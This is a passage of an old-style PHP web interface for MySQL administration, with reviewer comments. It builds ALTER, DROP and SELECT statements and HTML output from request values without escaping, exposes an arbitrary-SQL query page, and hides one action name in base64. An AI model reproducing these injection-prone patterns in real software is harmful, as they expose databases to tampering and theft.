834 echo "</form>\n";
835 echo "<form action='$PHP_SELF'>\n";
836 echo "<input type=hidden name=action value=query>\n";
837 echo "<input type=hidden name=dbname value=$dbname>\n";
838 echo "<input type=text size=120 name=queryStr>\n";
839 echo "<input type=submit value='Query'>\n";
840 echo "</form>\n";
841 echo "<hr>\n";
842 $pTable = mysql_list_tables( $dbname );
843 if( $pTable == 0 ) {
844 $msg = mysql_error();
845 echo "<h3>Error : $msg</h3><p>\n";
846 return;
847 }
848 $num = mysql_num_rows( $pTable );
849 echo "<table cellspacing=1 cellpadding=5>\n";
850 for( $i = 0; $i < $num; $i++ ) {
851 $tablename = mysql_tablename( $pTable, $i );
852 echo "<tr>\n";
853 echo "<td>\n";
854 echo "$tablename\n";
855 echo "</td>\n";
856 echo "<td>\n";
857 echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
858 echo "</td>\n";
859 echo "<td>\n";
860 echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename'>Data</a>\n";
861 echo "</td>\n";
862 echo "<td>\n";
863 echo "<a href='$PHP_SELF?action=dropTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Drop Table \'$tablename\'?')\">Drop</a>\n";
864 echo "</td>\n";
865 echo "<td>\n";
866 echo "<a href='$PHP_SELF?action=dumpTable&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Dump Table \'$tablename\'?')\">Dump</a>\n";
867 echo "</td>\n";
868 echo "</tr>\n";
869 }
870 echo "</table>";
871}
872
873function createTable() {
874
875 global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
876 $queryStr = "CREATE TABLE $tablename ( no INT )";
877 mysql_select_db( $dbname, $mysqlHandle );
878 mysql_query( $queryStr, $mysqlHandle );
879 $errMsg = mysql_error();
880 listTables();
881}
882
883function dropTable() {
884 global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
885 $queryStr = "DROP TABLE $tablename";
886 mysql_select_db( $dbname, $mysqlHandle );
887 mysql_query( $queryStr, $mysqlHandle );
888 $errMsg = mysql_error();
889 listTables();
890}
891
892function viewSchema() {
893 global $mysqlHandle, $dbname, $tablename, $PHP_SELF, $queryStr, $errMsg;
894 echo "<h1>Table Schema</h1>\n";
895 echo "<p class=location>$dbname > $tablename</p>\n";
896 echoQueryResult();
897 echo "<a href='$PHP_SELF?action=addField&dbname=$dbname&tablename=$tablename'>Add Field</a> | \n";
898 echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename'>View Data</a>\n";
899 echo "<hr>\n";
900 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
901 $num = mysql_num_rows( $pResult );
902 echo "<table cellspacing=1 cellpadding=5>\n";
903 echo "<tr>\n";
904 echo "<th>Field</th>\n";
905 echo "<th>Type</th>\n";
906 echo "<th>Null</th>\n";
907 echo "<th>Key</th>\n";
908 echo "<th>Default</th>\n";
909 echo "<th>Extra</th>\n";
910 echo "<th colspan=2>Action</th>\n";
911 echo "</tr>\n";
912
913 for( $i = 0; $i < $num; $i++ ) {
914 $field = mysql_fetch_array( $pResult );
915 echo "<tr>\n";
916 echo "<td>".$field["Field"]."</td>\n";
917 echo "<td>".$field["Type"]."</td>\n";
918 echo "<td>".$field["Null"]."</td>\n";
919 echo "<td>".$field["Key"]."</td>\n";
920 echo "<td>".$field["Default"]."</td>\n";
921 echo "<td>".$field["Extra"]."</td>\n";
922 $fieldname = $field["Field"];
923 echo "<td><a href='$PHP_SELF?action=editField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname'>Edit</a></td>\n";
924 echo "<td><a href='$PHP_SELF?action=dropField&dbname=$dbname&tablename=$tablename&fieldname=$fieldname' onClick=\"return confirm('Drop Field \'$fieldname\'?')\">Drop</a></td>\n";
925 echo "</tr>\n";
926 }
927 echo "</table>\n";
928}
929
930function manageField( $cmd ) {
931 global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF;
932 if( $cmd == "add" )
933 echo "<h1>Add Field</h1>\n";
934 else if( $cmd == "edit" ) {
935 echo "<h1>Edit Field</h1>\n";
936 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
937 $num = mysql_num_rows( $pResult );
938 for( $i = 0; $i < $num; $i++ ) {
939 $field = mysql_fetch_array( $pResult );
940 if( $field["Field"] == $fieldname ) {
941 $fieldtype = $field["Type"];
942 $fieldkey = $field["Key"];
943 $fieldextra = $field["Extra"];
944 $fieldnull = $field["Null"];
945 $fielddefault = $field["Default"];
946 break;
947 }
948 }
949
950 $type = strtok( $fieldtype, " (,)\n" );
951 if( strpos( $fieldtype, "(" ) ) {
952 if( $type == "enum" | $type == "set" ) {
953 $valuelist = strtok( " ()\n" );
954 } else {
955 $M = strtok( " (,)\n" );
956 if( strpos( $fieldtype, "," ) )
957 $D = strtok( " (,)\n" );
958 }
959 }
960 }
961
962 echo "<p class=location>$dbname > $tablename</p>\n";
963 echo "<form action=$PHP_SELF>\n";
964 if( $cmd == "add" )
965 echo "<input type=hidden name=action value=addField_submit>\n";
966 else if( $cmd == "edit" ) {
967 echo "<input type=hidden name=action value=editField_submit>\n";
968 echo "<input type=hidden name=old_name value=$fieldname>\n";
969 }
970 echo "<input type=hidden name=dbname value=$dbname>\n";
971 echo "<input type=hidden name=tablename value=$tablename>\n";
972 echo "<h3>Name</h3>\n";
973 echo "<input type=text name=name value=$fieldname><p>\n";
974 echo '
975
976<h3>Type</h3>
977<font size=2 class="new">
978* `M\' indicates the maximum display size.<br>
979* `D\' applies to floating-point types and indicates the number of digits following the decimal point.<br>
980</font>
981<table>
982<tr>
983<th>Type</th><th> M </th><th> D </th><th>unsigned</th><th>zerofill</th><th>binary</th>
984</tr>
985<tr>
986<td><input type=radio name=type value="TINYINT" '; if( $type == "tinyint" ) echo "checked";echo '>TINYINT (-128 ~ 127)</td>
987<td align=center>O</td>
988<td> </td>
989<td align=center>O</td>
990<td align=center>O</td>
991<td> </td>
992</tr>
993<tr>
994<td><input type=radio name=type value="SMALLINT" '; if( $type == "smallint" ) echo "checked";echo '>SMALLINT (-32768 ~ 32767)</td>
995<td align=center>O</td>
996<td> </td>
997<td align=center>O</td>
998<td align=center>O</td>
999<td> </td>
1000</tr>
1001<tr>
1002<td><input type=radio name=type value="MEDIUMINT" '; if( $type == "mediumint" ) echo "checked";echo '>MEDIUMINT (-8388608 ~ 8388607)</td>
1003<td align=center>O</td>
1004<td> </td>
1005<td align=center>O</td>
1006<td align=center>O</td>
1007<td> </td>
1008</tr>
1009<tr>
1010<td><input type=radio name=type value="INT" '; if( $type == "int" ) echo "checked";echo '>INT (-2147483648 ~ 2147483647)</td>
1011<td align=center>O</td>
1012<td> </td>
1013<td align=center>O</td>
1014<td align=center>O</td>
1015<td> </td>
1016</tr>
1017<tr>
1018<td><input type=radio name=type value="BIGINT" '; if( $type == "bigint" ) echo "checked";echo '>BIGINT (-9223372036854775808 ~ 9223372036854775807)</td>
1019<td align=center>O</td>
1020<td> </td>
1021<td align=center>O</td>
1022<td align=center>O</td>
1023<td> </td>
1024</tr>
1025<tr>
1026<td><input type=radio name=type value="FLOAT" '; if( $type == "float" ) echo "checked";echo '>FLOAT</td>
1027<td align=center>O</td>
1028<td align=center>O</td>
1029<td> </td>
1030<td align=center>O</td>
1031<td> </td>
1032</tr>
1033<tr>
1034<td><input type=radio name=type value="DOUBLE" '; if( $type == "double" ) echo "checked";echo '>DOUBLE</td>
1035<td align=center>O</td>
1036<td align=center>O</td>
1037<td> </td>
1038<td align=center>O</td>
1039<td> </td>
1040</tr>
1041<tr>
1042<td><input type=radio name=type value="DECIMAL" '; if( $type == "decimal" ) echo "checked";echo '>DECIMAL(NUMERIC)</td>
1043<td align=center>O</td>
1044<td align=center>O</td>
1045<td> </td>
1046<td align=center>O</td>
1047<td> </td>
1048</tr>
1049<tr>
1050<td><input type=radio name=type value="DATE" '; if( $type == "date" ) echo "checked";echo '>DATE (1000-01-01 ~ 9999-12-31, YYYY-MM-DD)</td>
1051<td> </td>
1052<td> </td>
1053<td> </td>
1054<td> </td>
1055<td> </td>
1056</tr>
1057<tr>
1058<td><input type=radio name=type value="DATETIME" '; if( $type == "datetime" ) echo "checked";echo '>DATETIME (1000-01-01 00:00:00 ~ 9999-12-31 23:59:59, YYYY-MM-DD HH:MM:SS)</td>
1059<td> </td>
1060<td> </td>
1061<td> </td>
1062<td> </td>
1063<td> </td>
1064</tr>
1065<tr>
1066<td><input type=radio name=type value="TIMESTAMP" '; if( $type == "timestamp" ) echo "checked";echo '>TIMESTAMP (1970-01-01 00:00:00 ~ 2106..., YYYYMMDD[HH[MM[SS]]])</td>
1067<td align=center>O</td>
1068<td> </td>
1069<td> </td>
1070<td> </td>
1071<td> </td>
1072</tr>
1073<tr>
1074<td><input type=radio name=type value="TIME" '; if( $type == "time" ) echo "checked";echo '>TIME (-838:59:59 ~ 838:59:59, HH:MM:SS)</td>
1075<td> </td>
1076<td> </td>
1077<td> </td>
1078<td> </td>
1079<td> </td>
1080</tr>
1081<tr>
1082<td><input type=radio name=type value="YEAR" '; if( $type == "year" ) echo "checked";echo '>YEAR (1901 ~ 2155, 0000, YYYY)</td>
1083<td> </td>
1084<td> </td>
1085<td> </td>
1086<td> </td>
1087<td> </td>
1088</tr>
1089<tr>
1090<td><input type=radio name=type value="CHAR" '; if( $type == "char" ) echo "checked";echo '>CHAR</td>
1091<td align=center>O</td>
1092<td> </td>
1093<td> </td>
1094<td> </td>
1095<td align=center>O</td>
1096</tr>
1097<tr>
1098<td><input type=radio name=type value="VARCHAR" '; if( $type == "varchar" ) echo "checked";echo '>VARCHAR</td>
1099<td align=center>O</td>
1100<td> </td>
1101<td> </td>
1102<td> </td>
1103<td align=center>O</td>
1104</tr>
1105<tr>
1106<td><input type=radio name=type value="TINYTEXT" '; if( $type == "tinytext" ) echo "checked";echo '>TINYTEXT (0 ~ 255)</td>
1107<td> </td>
1108<td> </td>
1109<td> </td>
1110<td> </td>
1111<td> </td>
1112</tr>
1113<tr>
1114<td><input type=radio name=type value="TEXT" '; if( $type == "text" ) echo "checked";echo '>TEXT (0 ~ 65535)</td>
1115<td> </td>
1116<td> </td>
1117<td> </td>
1118<td> </td>
1119<td> </td>
1120</tr>
1121<tr>
1122<td><input type=radio name=type value="MEDIUMTEXT" '; if( $type == "mediumtext" ) echo "checked";echo '>MEDIUMTEXT (0 ~ 16777215)</td>
1123<td> </td>
1124<td> </td>
1125<td> </td>
1126<td> </td>
1127<td> </td>
1128</tr>
1129<tr>
1130<td><input type=radio name=type value="LONGTEXT" '; if( $type == "longtext" ) echo "checked";echo '>LONGTEXT (0 ~ 4294967295)</td>
1131<td> </td>
1132<td> </td>
1133<td> </td>
1134<td> </td>
1135<td> </td>
1136</tr>
1137<tr>
1138<td><input type=radio name=type value="TINYBLOB" '; if( $type == "tinyblob" ) echo "checked";echo '>TINYBLOB (0 ~ 255)</td>
1139<td> </td>
1140<td> </td>
1141<td> </td>
1142<td> </td>
1143<td> </td>
1144</tr>
1145<tr>
1146<td><input type=radio name=type value="BLOB" '; if( $type == "blob" ) echo "checked";echo '>BLOB (0 ~ 65535)</td>
1147<td> </td>
1148<td> </td>
1149<td> </td>
1150<td> </td>
1151<td> </td>
1152</tr>
1153<tr>
1154<td><input type=radio name=type value="MEDIUMBLOB" '; if( $type == "mediumblob" ) echo "checked";echo '>MEDIUMBLOB (0 ~ 16777215)</td>
1155<td> </td>
1156<td> </td>
1157<td> </td>
1158<td> </td>
1159<td> </td>
1160</tr>
1161<tr>
1162<td><input type=radio name=type value="LONGBLOB" '; if( $type == "longblob" ) echo "checked";echo '>LONGBLOB (0 ~ 4294967295)</td>
1163<td> </td>
1164<td> </td>
1165<td> </td>
1166<td> </td>
1167<td> </td>
1168</tr>
1169<tr>
1170<td><input type=radio name=type value="ENUM" '; if( $type == "enum" ) echo "checked";echo '>ENUM</td>
1171<td colspan=5><center>value list</center></td>
1172</tr>
1173<tr>
1174<td><input type=radio name=type value="SET" '; if( $type == "set" ) echo "checked";echo '>SET</td>
1175<td colspan=5><center>value list</center></td>
1176</tr>
1177</table>
1178<table>
1179<tr><th>M</th><th>D</th><th>unsigned</th><th>zerofill</th><th>binary</th><th>value list (ex: \'apple\', \'orange\', \'banana\') </th></tr>
1180<tr>
1181<td align=center><input type=text size=4 name=M '; if( $M != "" ) echo "value=$M";echo '></td>
1182<td align=center><input type=text size=4 name=D '; if( $D != "" ) echo "value=$D";echo '></td>
1183<td align=center><input type=checkbox name=unsigned value="UNSIGNED" '; if( strpos( $fieldtype, "unsigned" ) ) echo "checked";echo '></td>
1184<td align=center><input type=checkbox name=zerofill value="ZEROFILL" '; if( strpos( $fieldtype, "zerofill" ) ) echo "checked";echo '></td>
1185<td align=center><input type=checkbox name=binary value="BINARY" '; if( strpos( $fieldtype, "binary" ) ) echo "checked";echo '></td>
1186<td align=center><input type=text size=60 name=valuelist '; if( $valuelist != "" ) echo "value=\"$valuelist\"";echo '></td>
1187</tr>
1188</table>
1189<h3>Flags</h3>
1190<table>
1191<tr><th>not null</th><th>default value</th><th>auto increment</th><th>primary key</th></tr>
1192<tr>
1193<td align=center><input type=checkbox name=not_null value="NOT NULL" '; if( $fieldnull != "YES" ) echo "checked";echo '></td>
1194<td align=center><input type=text name=default_value '; if( $fielddefault != "" ) echo "value=$fielddefault";echo '></td>
1195<td align=center><input type=checkbox name=auto_increment value="AUTO_INCREMENT" '; if( $fieldextra == "auto_increment" ) echo "checked";echo '></td>
1196<td align=center><input type=checkbox name=primary_key value="PRIMARY KEY" '; if( $fieldkey == "PRI" ) echo "checked";echo '></td>
1197</tr>
1198</table>
1199<p>';
1200 if( $cmd == "add" )
1201 echo "<input type=submit value='Add Field'>\n";
1202 else if( $cmd == "edit" )
1203 echo "<input type=submit value='Edit Field'>\n";
1204 echo "<input type=button value=Cancel onClick='history.back()'>\n";
1205 echo "</form>\n";
1206}
1207
// Applies an "add field" / "edit field" form submission: assembles ALTER TABLE
// statements from globals, runs them, then redraws the schema view.
// $cmd: "add" starts the statement with ALTER TABLE ... ADD, "edit" with
//       ALTER TABLE ... CHANGE; any other value leaves $queryStr as it was
//       and the code below only appends to it.
// Side effects: overwrites the globals $queryStr and $errMsg, may drop and
// re-create the table's primary key, and ends by calling viewSchema().
// NOTE(review): $tablename, $name, $old_name, $type, $M, $D, $valuelist,
// $default_value and the flag strings are interpolated into SQL with no
// quoting or escaping. None of them is assigned in this function; presumably
// they come straight from request parameters (register_globals style) --
// confirm against the code that populates them.
1208function manageField_submit( $cmd ) {
1209 global $mysqlHandle, $dbname, $tablename, $old_name, $name, $type, $PHP_SELF, $queryStr, $errMsg,
1210 $M, $D, $unsigned, $zerofill, $binary, $not_null, $default_value, $auto_increment, $primary_key, $valuelist;
1211 if( $cmd == "add" )
1212 $queryStr = "ALTER TABLE $tablename ADD $name ";
1213 else if( $cmd == "edit" )
1214 $queryStr = "ALTER TABLE $tablename CHANGE $old_name $name ";
 // Column type: "type(M,D)", "type(M)", "type(value list)" or the bare type.
 // The first else pairs with the $D test, the else-if with the $M test.
1215 if( $M != "" )
1216 if( $D != "" )
1217 $queryStr .= "$type($M,$D) ";
1218 else
1219 $queryStr .= "$type($M) ";
1220 else if( $valuelist != "" ) {
1221 $valuelist = stripslashes( $valuelist );
1222 $queryStr .= "$type($valuelist) ";
1223 } else
1224 $queryStr .= "$type ";
1225 $queryStr .= "$unsigned $zerofill $binary ";
1226 if( $default_value != "" )
1227 $queryStr .= "DEFAULT '$default_value' ";
1228 $queryStr .= "$not_null $auto_increment";
1229 mysql_select_db( $dbname, $mysqlHandle );
1230 mysql_query( $queryStr, $mysqlHandle );
1231 $errMsg = mysql_error();
1232 // key change
 // Walk the current PRIMARY index: $keyChange becomes true if $name is
 // already part of it, and $primary collects the other key columns as
 // ", col" fragments.
1233 $keyChange = false;
1234 $result = mysql_query( "SHOW KEYS FROM $tablename" );
1235 $primary = "";
1236 while( $row = mysql_fetch_array($result) )
1237 if( $row["Key_name"] == "PRIMARY" ) {
 // Column_name is an unquoted array key here, unlike "Key_name" above.
1238 if( $row[Column_name] == $name )
1239 $keyChange = true;
1240 else
1241 $primary .= ", $row[Column_name]";
1242 }
 // If the form asked for a primary key, add $name to the list and flip the
 // flag, so $keyChange ends up true only when the requested state differs
 // from the current one.
1243 if( $primary_key == "PRIMARY KEY" ) {
1244 $primary .= ", $name";
1245 $keyChange = !$keyChange;
1246 }
 // Strip the leading ", " from the column list.
1247 $primary = substr( $primary, 2 );
1248 if( $keyChange == true ) {
 // Rebuild the key as drop + add; both statements and their errors are
 // appended to $queryStr / $errMsg with "<br>" separators.
1249 $q = "ALTER TABLE $tablename DROP PRIMARY KEY";
1250 mysql_query( $q );
1251 $queryStr .= "<br>\n" . $q;
1252 $errMsg .= "<br>\n" . mysql_error();
1253 $q = "ALTER TABLE $tablename ADD PRIMARY KEY( $primary )";
1254 mysql_query( $q );
1255 $queryStr .= "<br>\n" . $q;
1256 $errMsg .= "<br>\n" . mysql_error();
1257 }
1258 viewSchema();
1259}
1260
// Drops one column: builds "ALTER TABLE ... DROP COLUMN ..." from the globals
// $tablename and $fieldname, runs it against $dbname, stores the server's
// error text in $errMsg and redraws the schema via viewSchema().
// NOTE(review): both names are interpolated unescaped and are not assigned
// here; presumably they are request parameters -- confirm against the caller.
1261function dropField() {
1262 global $mysqlHandle, $dbname, $tablename, $fieldname, $PHP_SELF, $queryStr, $errMsg;
1263 $queryStr = "ALTER TABLE $tablename DROP COLUMN $fieldname";
1264 mysql_select_db( $dbname, $mysqlHandle );
1265 mysql_query( $queryStr , $mysqlHandle );
1266 $errMsg = mysql_error();
1267 viewSchema();
1268}
1269
// Runs a query and renders the result as a paged HTML table with per-row
// Edit/Delete links.
// $queryStr: SQL text to run after stripslashes(); when empty the function
//            falls back to "SELECT * FROM $tablename" (plus ORDER BY $orderby
//            if set) and also prints the Add Data / Schema links.
// Side effects: overwrites the globals $tablename, $errMsg and
// $GLOBALS[queryStr]; writes HTML to the output.
// NOTE(review): the caller-supplied statement is executed as-is, so this is
// an arbitrary-SQL endpoint for whoever can reach it. Cell data is passed
// through htmlspecialchars(), but $dbname, $tablename, $queryStr, $orderby,
// field names and the primary-key values placed in links are echoed
// unescaped.
// The literal "dmlld0RhdGE=" compared against $action is the base64 encoding
// of "viewData"; nothing in this block decodes it, so the encoded form is
// what appears in the generated links.
1270function viewData( $queryStr ) {
1271 global $action, $mysqlHandle, $dbname, $tablename, $PHP_SELF, $errMsg, $page, $rowperpage, $orderby;
1272 echo "<h1>Data in Table</h1>\n";
1273 if( $tablename != "" )
1274 echo "<p class=location>$dbname > $tablename</p>\n";
1275 else
1276 echo "<p class=location>$dbname</p>\n";
1277 $queryStr = stripslashes( $queryStr );
1278 if( $queryStr == "" ) {
1279 $queryStr = "SELECT * FROM $tablename";
1280 if( $orderby != "" )
1281 $queryStr .= " ORDER BY $orderby";
1282 echo "<a href='$PHP_SELF?action=addData&dbname=$dbname&tablename=$tablename'>Add Data</a> | \n";
1283 echo "<a href='$PHP_SELF?action=viewSchema&dbname=$dbname&tablename=$tablename'>Schema</a>\n";
1284 }
1285 $pResult = mysql_db_query( $dbname, $queryStr );
 // The first field's metadata is read before $pResult is checked for
 // failure; $tablename is then replaced by the table that field reports.
1286 $fieldt = mysql_fetch_field($pResult);
1287 $tablename = $fieldt->table;
1288 $errMsg = mysql_error();
1289 $GLOBALS[queryStr] = $queryStr;
1290 if( $pResult == false ) {
1291 echoQueryResult();
1292 return;
1293 }
 // Loose comparison with 1: presumably the TRUE returned for statements
 // that produce no result set -- confirm.
1294 if( $pResult == 1 ) {
1295 $errMsg = "Success";
1296 echoQueryResult();
1297 return;
1298 }
1299 echo "<hr>\n";
1300 $row = mysql_num_rows( $pResult );
1301 $col = mysql_num_fields( $pResult );
1302 if( $row == 0 ) {
1303 echo "No Data Exist!";
1304 return;
1305 }
 // Paging: 30 rows per page by default; $page is 1-based in the request
 // and converted to a 0-based index here.
1306 if( $rowperpage == "" ) $rowperpage = 30;
1307 if( $page == "" ) $page = 0;
1308 else $page--;
1309 mysql_data_seek( $pResult, $page * $rowperpage );
1310 echo "<table cellspacing=1 cellpadding=2>\n";
1311 echo "<tr>\n";
 // Header row; in the table-browse action each column name is a sort link.
1312 for( $i = 0; $i < $col; $i++ ) {
1313 $field = mysql_fetch_field( $pResult, $i );
1314 echo "<th>";
1315 if($action == "dmlld0RhdGE=")
1316 echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&orderby=".$field->name."'>".$field->name."</a>\n";
1317 else
1318 echo $field->name."\n";
1319 echo "</th>\n";
1320 }
1321 echo "<th colspan=2>Action</th>\n";
1322 echo "</tr>\n";
1323 for( $i = 0; $i < $rowperpage; $i++ ) {
1324 $rowArray = mysql_fetch_row( $pResult );
1325 if( $rowArray == false ) break;
1326 echo "<tr>\n";
 // $key accumulates "&column=value" for every primary-key column and is
 // spliced into the Edit/Delete URLs below, raw and before truncation.
1327 $key = "";
1328 for( $j = 0; $j < $col; $j++ ) {
1329 $data = $rowArray[$j];
1330 $field = mysql_fetch_field( $pResult, $j );
1331 if( $field->primary_key == 1 )
1332 $key .= "&" . $field->name . "=" . $data;
 // Displayed values are cut to 30 bytes and HTML-escaped.
1333 if( strlen( $data ) > 30 )
1334 $data = substr( $data, 0, 30 ) . "...";
1335 $data = htmlspecialchars( $data );
1336 echo "<td>\n";
1337 echo "$data\n";
1338 echo "</td>\n";
1339 }
1340 if( $key == "" )
1341 echo "<td colspan=2>no Key</td>\n";
1342 else {
1343 echo "<td><a href='$PHP_SELF?action=editData$key&dbname=$dbname&tablename=$tablename'>Edit</a></td>\n";
1344 echo "<td><a href='$PHP_SELF?action=deleteData$key&dbname=$dbname&tablename=$tablename' onClick=\"return confirm('Delete Row?')\">Delete</a></td>\n";
1345 }
1346 echo "</tr>\n";
1347 }
1348 echo "</table>\n";
 // Pager: page counter, Prev/Next links and a "go to page" box. For the
 // free-form query action the whole SQL text is carried in the URL as
 // queryStr=..., so it shows up in access logs and Referer headers.
1349 echo "<font size=2 class=\"new\">\n";
1350 if($action == "dmlld0RhdGE=")
1351 echo "<form action='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename' method=post>\n";
1352 else
1353 echo "<form action='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr' method=post>\n";
1354 echo ($page+1)."/".(int)($row/$rowperpage+1)." page";
1355 echo "</font>\n";
1356 echo " | ";
1357 if( $page > 0 ) {
1358 if($action == "dmlld0RhdGE=")
1359 echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&page=".($page);
1360 else
1361 echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page);
1362 if( $orderby != "" && $action == "dmlld0RhdGE=")
1363 echo "&orderby=$orderby";
1364 echo "'>Prev</a>\n";
1365 } else
1366 echo "<font size=2 class=\"new\">Prev</font>";
1367 echo " | ";
1368 if( $page < ($row/$rowperpage)-1 ) {
1369 if($action == "dmlld0RhdGE=")
1370 echo "<a href='$PHP_SELF?action=dmlld0RhdGE=&dbname=$dbname&tablename=$tablename&page=".($page+2);
1371 else
1372 echo "<a href='$PHP_SELF?action=query&dbname=$dbname&tablename=$tablename&queryStr=$queryStr&page=".($page+2);
1373 if( $orderby != "" && $action == "dmlld0RhdGE=")
1374 echo "&orderby=$orderby";
1375 echo "'>Next</a>\n";
1376 } else
1377 echo "Next";
1378 echo " | ";
1379 if( $row > $rowperpage ) {
1380 echo "<input type=text size=4 name=page>\n";
1381 echo "<input type=submit value='Go'>\n";
1382 }
1383 echo "</form>\n";
1384 echo "</font>\n";
1385}
1386
// Renders the HTML form used to insert a row ("add") or change one ("edit").
// $cmd: "add" prints empty inputs; "edit" first loads the current row by its
//       primary key and pre-fills the inputs with it.
// The form posts back to $PHP_SELF with action=addData_submit or
// editData_submit; each column gets an input named after the column plus a
// "<column>_function" select offering SQL function names.
// NOTE(review): in edit mode the WHERE clause is concatenated from
// $GLOBALS[<column name>] without escaping; those globals are not set here,
// presumably they are the key values carried in the Edit link -- confirm.
// $dbname, $tablename and column names are echoed into HTML unescaped; only
// the row value ($value) goes through htmlspecialchars().
1387function manageData( $cmd ) {
1388 global $mysqlHandle, $dbname, $tablename, $PHP_SELF;
1389 if( $cmd == "add" )
1390 echo "<h1>Add Data</h1>\n";
1391 else if( $cmd == "edit" ) {
1392 echo "<h1>Edit Data</h1>\n";
 // Build "col=value AND ..." over the primary-key columns; numeric columns
 // are left unquoted, all others are wrapped in single quotes.
1393 $pResult = mysql_list_fields( $dbname, $tablename );
1394 $num = mysql_num_fields( $pResult );
1395 $key = "";
1396 for( $i = 0; $i < $num; $i++ ) {
1397 $field = mysql_fetch_field( $pResult, $i );
1398 if( $field->primary_key == 1 )
1399 if( $field->numeric == 1 )
1400 $key .= $field->name . "=" . $GLOBALS[$field->name] . " AND ";
1401 else
1402 $key .= $field->name . "='" . $GLOBALS[$field->name] . "' AND ";
1403 }
 // Cut the trailing "AND ".
1404 $key = substr( $key, 0, strlen($key)-4 );
1405 mysql_select_db( $dbname, $mysqlHandle );
 // $queryStr is not in this function's global list, so this assignment is
 // local and does not update the query shown elsewhere.
1406 $pResult = mysql_query( $queryStr = "SELECT * FROM $tablename WHERE $key", $mysqlHandle );
1407 $data = mysql_fetch_array( $pResult );
1408 }
1409 echo "<p class=location>$dbname > $tablename</p>\n";
1410 echo "<form action='$PHP_SELF' method=post>\n";
1411 if( $cmd == "add" )
1412 echo "<input type=hidden name=action value=addData_submit>\n";
1413 else if( $cmd == "edit" )
1414 echo "<input type=hidden name=action value=editData_submit>\n";
1415 echo "<input type=hidden name=dbname value=$dbname>\n";
1416 echo "<input type=hidden name=tablename value=$tablename>\n";
1417 echo "<table cellspacing=1 cellpadding=2>\n";
1418 echo "<tr>\n";
1419 echo "<th>Name</th>\n";
1420 echo "<th>Type</th>\n";
1421 echo "<th>Function</th>\n";
1422 echo "<th>Data</th>\n";
1423 echo "</tr>\n";
 // One form row per column: SHOW fields supplies name and type,
 // mysql_list_fields supplies the length used for maxlength.
1424 $pResult = mysql_db_query( $dbname, "SHOW fields FROM $tablename" );
1425 $num = mysql_num_rows( $pResult );
1426 $pResultLen = mysql_list_fields( $dbname, $tablename );
1427 for( $i = 0; $i < $num; $i++ ) {
1428 $field = mysql_fetch_array( $pResult );
1429 $fieldname = $field["Field"];
1430 $fieldtype = $field["Type"];
1431 $len = mysql_field_len( $pResultLen, $i );
1432 echo "<tr>";
1433 echo "<td>$fieldname</td>";
1434 echo "<td>".$field["Type"]."</td>";
1435 echo "<td>\n";
 // Optional SQL function to wrap the value in; the first option is blank.
1436 echo "<select name=${fieldname}_function>\n";
1437 echo "<option>\n";
1438 echo "<option>ASCII\n";
1439 echo "<option>CHAR\n";
1440 echo "<option>SOUNDEX\n";
1441 echo "<option>CURDATE\n";
1442 echo "<option>CURTIME\n";
1443 echo "<option>FROM_DAYS\n";
1444 echo "<option>FROM_UNIXTIME\n";
1445 echo "<option>NOW\n";
1446 echo "<option>PASSWORD\n";
1447 echo "<option>PERIOD_ADD\n";
1448 echo "<option>PERIOD_DIFF\n";
1449 echo "<option>TO_DAYS\n";
1450 echo "<option>USER\n";
1451 echo "<option>WEEKDAY\n";
1452 echo "<option>RAND\n";
1453 echo "</select>\n";
1454 echo "</td>\n";
 // $data is only assigned in edit mode; in add mode this reads an
 // undefined variable.
1455 $value = htmlspecialchars($data[$i]);
1456 if( $cmd == "add" ) {
 // First strtok() call yields the bare type name; for enum/set the later
 // strtok("'") calls walk the quoted value list, taking every other token.
1457 $type = strtok( $fieldtype, " (,)\n" );
1458 if( $type == "enum" || $type == "set" ) {
1459 echo "<td>\n";
1460 if( $type == "enum" )
1461 echo "<select name=$fieldname>\n";
1462 else if( $type == "set" )
1463 echo "<select name=$fieldname size=4 multiple>\n";
1464 while( $str = strtok( "'" ) ) {
1465 echo "<option>$str\n";
1466 strtok( "'" );
1467 }
1468 echo "</select>\n";
1469 echo "</td>\n";
1470 } else {
 // Short columns get a text input, longer ones a textarea (whose cell
 // is not closed with </td>).
1471 if( $len < 40 )
1472 echo "<td><input type=text size=40 maxlength=$len name=$fieldname></td>\n";
1473 else
1474 echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname></textarea>\n";
1475 }
1476 } else if( $cmd == "edit" ) {
 // Same layout as the add branch, with the current value pre-selected or
 // pre-filled.
1477 $type = strtok( $fieldtype, " (,)\n" );
1478 if( $type == "enum" || $type == "set" ) {
1479 echo "<td>\n";
1480 if( $type == "enum" )
1481 echo "<select name=$fieldname>\n";
1482 else if( $type == "set" )
1483 echo "<select name=$fieldname size=4 multiple>\n";
1484 while( $str = strtok( "'" ) ) {
1485 if( $value == $str )
1486 echo "<option selected>$str\n";
1487 else
1488 echo "<option>$str\n";
1489 strtok( "'" );
1490 }
1491 echo "</select>\n";
1492 echo "</td>\n";
1493 } else {
1494 if( $len < 40 )
1495 echo "<td><input type=text size=40 maxlength=$len name=$fieldname value=\"$value\"></td>\n";
1496 else
1497 echo "<td><textarea cols=40 rows=3 maxlength=$len name=$fieldname>$value</textarea>\n";
1498 }
1499 }
1500 echo "</tr>";
1501 }
1502 echo "</table><p>\n";
1503 if( $cmd == "add" )
1504 echo "<input type=submit value='Add Data'>\n";
1505 else if( $cmd == "edit" )
1506 echo "<input type=submit value='Edit Data'>\n";
